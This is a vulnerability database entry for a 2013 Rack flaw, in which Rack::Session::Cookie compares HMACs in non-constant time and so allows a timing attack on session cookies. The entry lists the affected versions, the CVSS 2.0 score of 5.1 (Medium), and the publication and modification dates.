Description


Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, 1.3.x before 1.3.10, 1.2.x before 1.2.8, and 1.1.x before 1.1.6 allows remote attackers to guess the session cookie, gain privileges, and execute arbitrary code via a timing attack involving an HMAC comparison function that does not run in constant time.

Related CPE's


a

rack_project

rack

28

Weaknesses



NVD-CWE-noinfo

CVSS impact metrics


AV:N/AC:H/Au:N/C:P/I:P/A:P

5.1 · Medium

  • CVSS V3.1

  • CVSS V3.0

  • CVSS V2.0

Information


Source identifier

[email protected]

Vulnerability status

Modified

Published

2013-02-08T20:55:01.640

12 years ago

Last modified

2023-02-13T04:40:27.140

2 years ago